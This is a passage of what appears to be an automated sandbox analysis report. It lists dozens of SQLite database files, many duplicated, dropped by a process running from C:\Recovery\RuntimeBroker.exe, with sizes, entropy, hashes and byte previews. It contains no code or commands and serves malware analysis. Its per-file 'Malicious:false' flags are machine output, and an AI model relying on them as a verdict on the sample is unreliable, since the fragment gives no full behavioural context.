                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
